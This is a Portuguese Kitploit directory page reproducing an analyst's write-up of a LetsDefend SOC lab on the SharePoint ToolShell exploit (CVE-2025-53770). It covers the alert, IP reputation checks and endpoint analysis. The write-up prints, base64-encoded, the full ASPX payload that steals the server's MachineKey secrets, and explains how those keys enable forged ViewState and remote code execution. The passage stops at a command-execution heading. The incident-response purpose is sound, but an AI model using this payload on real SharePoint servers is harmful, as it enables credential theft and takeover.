Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — Guia detalhado da exploração da vulnerabilidade zero-day CVE-2025-53770 (ToolShell) no SharePoint, incluindo análise de RCE, exfiltração de MachineKey, compilação de payload, implantação de web shell e etapas de contenção de resposta a incidentes. | Kitploit
Ferramentas/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
Gerenciamento de Indicadores de Comprometimento (IOC)Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise de MalwareForensia DigitalTestes de PenetraçãoInteligência de Ameaças

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Aprendizado e Educação
Resposta a Incidentes
Labs e Prática
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Guia detalhado da exploração da vulnerabilidade zero-day CVE-2025-53770 (ToolShell) no SharePoint, incluindo análise de RCE, exfiltração de MachineKey, compilação de payload, implantação de web shell e etapas de contenção de resposta a incidentes.

Ver Repositório
14há 1 anoAinda não revisado
Compartilhar

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Introdução

Eu investiguei um zero-day do SharePoint chamado ToolShell (CVE-2025-53770) no laboratório LetsDefend. Simulei um ataque zero-day do mundo real onde uma requisição POST maliciosa contornou a autenticação, executou PowerShell para roubar chaves MachineKeySection, compilou payload.exe e implantou uma web shell (spinstall0.aspx). Registrei tudo, analisei o comportamento e contive o host. Este README cobre os processos do ataque, os passos para mitigar o ataque e as lições aprendidas.

Visão Geral do Laboratório

  • Platform: LetsDefend Cyber Range
  • Target: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • Objective: Analisar RCE, praticar detecção e contenção

Ferramentas Utilizadas:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Base64 Decoder
  • LetsDefend Threat Intel

O Alerta

image

Este é um alerta crítico e uma atividade suspeita que teve como alvo o ToolPane.aspx do MS SharePoint com grande payload e Referer falsificado. O contexto CVE está vinculado ao CVE-2025-53770. É uma vulnerabilidade crítica de exploração do SharePoint através de uma requisição POST especialmente elaborada que permitia atacantes não autenticados. A exploração bem-sucedida levou à execução remota de código (RCE) no servidor. Tratei isso como ativo, alta urgência e assumi possível comprometimento bem-sucedido até prova em contrário.

Um Breve Significado do SharePoint

Microsoft SharePoint é uma plataforma para colaboração empresarial e gerenciamento de documentos — essencialmente um hub seguro e organizado para arquivos, fluxos de trabalho e aplicativos web internos.

Usos Principais

  • Gerenciamento de Documentos: Controle de versão, trilhas de auditoria e permissões de arquivos
  • Colaboração: Vários usuários podem co-editar e compartilhar documentos
  • Intranet / Portais: Notícias internas, políticas de RH, dashboards
  • Fluxos de Trabalho e Automação: Formulários, aprovações e notificações
  • Integração: Conecta-se com Teams, Outlook, aplicativos Office e Power BI

Considerações de Segurança do SharePoint

  • Utiliza Active Directory ou SSO para autenticação
  • Dados criptografados em repouso e em trânsito
  • Web parts e layouts podem ser abusados se mal configurados
  • A aplicação regular de patches é crítica para se defender contra explorações zero-day

O que é CVE-2025-53770 (ToolShell)

Um zero-day crítico no Microsoft SharePoint Server que permite que atacantes executem código remotamente sem autenticação. Ele abusa da desserialização insegura e frequentemente se encadeia com outras falhas do SharePoint (CVE-2025-49704, CVE-2025-49706) para assumir completamente o sistema. Classificado como CVSS 9.8 (Crítico) e ativamente explorado na natureza.

Análise do Ataque com VirusTotal

Analisei o endereço IP do remetente (Endereço IP de Origem) com VirusTotal Endereço IP de Origem: 107.191.58.76 image

A partir disso, posso ver que 15/95 fornecedores de segurança marcaram este endereço IP como malicioso, o que já diz muito sobre o IP.

Localização do IP

Agora preciso pesquisar a localização do IP. Isso foi feito com a ajuda do AbuseIPDB e, conforme mostrado abaixo, o IP é conhecido por hacking, força bruta, ataque a aplicações web, varredura de portas, envenenamento de DNS.

image

Análise de Endpoint

Como um Analista de SOC resolvendo isso, uma das etapas importantes a serem tomadas é a análise de endpoint. Procurei pelo host na segurança de endpoint com o nome 'SharePoint01' e, como o IP é conhecido por hacking, para análise adicional.

image

após localizar o host, visitei o histórico do terminal para verificar a linha de comando

image

| Linha de Comando do Histórico do Terminal

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

Flags do PowerShell: -nop -w hidden -e

  • -nop = Sem perfil (evitar scripts de perfil).
  • -w hidden = iniciar janela oculta (furtiva).
  • -e = comando codificado

Descobertas da Linha de Comando com Decodificador Base64:

Devido ao Payload, prossegui com o decodificador Base64 para decodificar o comando conforme mostrado abaixo

image

O usuário iniciou o powershell a partir do diretório do sistema “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” e com comandos codificados de script C# do lado do servidor ASP.NET.

  • Usa reflexão para carregar o assembly System.Web,
  • Acessa o MachineKeySection não público e chama um método não público (GetApplicationConfig),
  • Lê os valores MachineKey da aplicação web (ValidationKey, DecryptionKey, etc.),
  • Escreve essas chaves na resposta HTTP (ou seja, as exfiltra).

Capturando Payloads e Atividades Pós-Exploração: / _layouts/15/ToolPane.aspx?...

O payload tenta ler e vazar a MachineKey do ASP.NET para o host, um segredo que pode ser usado para forjar tokens ViewState/desserialização e permitir bypass de autenticação e execução remota de código. Isso corresponde ao padrão de exploração do ToolShell (abuso de MachineKey. Indicadores Chave de Comprometimento (IoCs) no comando com o uso de Decodificação e Codificação Base64.

  • O POST + payload grande + este comando codificado indica que o atacante provavelmente tentou criar ou executar tal script do lado do servidor através do caminho de exploração ToolShell.
  • A exposição da máquina e o alerta foram acionados: O uso de -encodedCommand + janela oculta + payload base64 indica evasão e exploração automatizada. Atacantes frequentemente usam -encodedCommand para esconder payloads e evitar padrões de detecção/registro de linha de comando permite que um atacante crie View State malicioso ou payloads serializados que a aplicação aceitará como válidos, possibilitando bypass de autenticação e execução remota de código em instâncias vulneráveis do SharePoint. Para ToolShell (CVE-2025-53770), esta é exatamente a cadeia de exploração.

Execução e Exploração de CMD

Baixar ferramenta